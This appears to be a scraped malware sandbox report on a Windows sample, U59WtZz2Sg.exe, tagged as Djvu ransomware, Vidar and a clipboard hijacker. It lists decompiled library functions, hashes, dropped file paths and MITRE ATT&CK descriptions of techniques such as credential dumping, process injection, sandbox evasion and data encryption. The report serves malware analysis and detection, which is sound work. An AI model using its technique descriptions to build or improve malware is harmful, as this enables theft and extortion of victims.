0x0042abee
0x0042abef
0x0042abf8
0x0042ac00
0x0042ac08
0x0042ac13
0x0042ac1d
0x0042ac22
0x0042ac27
0x0042ac31
0x0042ac3b
0x0042ac47
0x0042ac4b
0x0042ac57
0x0042ac5b
0x0042ac61
0x0042ac67
0x0042ac6b
0x0042ac71
0x0042ac82

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

0x00413c40
0x00413c44
0x00413c46
0x00413c47
0x00413c4a
0x00413c50
0x00413c57
0x00413c60
0x00413c8e
0x00413c93
0x00413c62
0x00413c62
0x00413c65
0x00413c96
0x00413c9b
0x00000000
0x00413c67
0x00413c68
0x00413c6d
0x00413c72
0x00413ca0
0x00413ca0
0x00413ca5
0x00413ca6
0x00413ca7
0x00413ca8
0x00413ca9
0x00413caa
0x00413cab
0x00413cac
0x00413cad
0x00413cae
0x00413caf
0x00413cb0
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413cba
0x00413cc2
0x00413cc8
0x00413ccf
0x00413ccf
0x00413cd7
0x00413c74
0x00413c78
0x00413c7d
0x00413c80
0x00413c83
0x00413c8b
0x00000000
0x00413c8b
0x00413c72
0x00413c65

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

0x00480621
0x00480626
0x00480628
0x0048062c
0x0048063d
0x00480642
0x00480642
0x0048064f
0x00480651
0x00480655
0x00480658
0x0048065c
0x00480663
0x00480663
0x00480667
0x0048066c
0x0048066f
0x00480674
0x00480679
0x00480679
0x00480686
0x00480692

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

.\crypto\evp\digest.c, xrefs: 00480638
ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

i;B, xrefs: 004242C9

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: i;B
API String ID: 4034010525-472376889
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0044F23E(void* __eflags, char _a4) {
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v60;
				intOrPtr _v68;
				char _v92;
				char _v100;
				char _v120;
				void* _t58;
				void* _t63;
				void* _t64;
				void* _t65;

				_t58 = _t63;
				_t64 = _t63 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6554;
				E00430ECA( &_v16, 0x5081fc);
				asm("int3");
				_push(_t58);
				_t65 = _t64 - 0xc;
				E00430CFC( &_v32,  &_v12);
				_v32 = 0x4d6560;
				E00430ECA( &_v32, 0x508238);
				asm("int3");
				_push(_t64);
				E00430CFC( &_v60,  &_v40);
				_v60 = 0x4d6578;
				E00430ECA( &_v60, 0x508274);
				asm("int3");
				_push(_t65);
				E0044EF74( &_v92, _v68);
				E00430ECA( &_v92, 0x508320);
				asm("int3");
				_push(_t65 - 0xc);
				E00430CFC( &_v120,  &_v100);
				_v120 = 0x4d656c;
				E00430ECA( &_v120, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f23f
0x0044f241
0x0044f251
0x0044f25e
0x0044f266
0x0044f26b
0x0044f26c
0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F247, 0044F25B

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Services
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report U59WtZz2Sg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Clipboard Hijacker

Threatname: Djvu

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\15593502492893213849595709

C:\ProgramData\28325875654976084354326271

C:\ProgramData\28516965580031020035471649

C:\ProgramData\50023325401737157063598945

C:\ProgramData\53195122028892118046415569

C:\ProgramData\69859612379489584907088796

C:\SystemID\PersonalID.txt

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Windows Analysis Report
U59WtZz2Sg.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre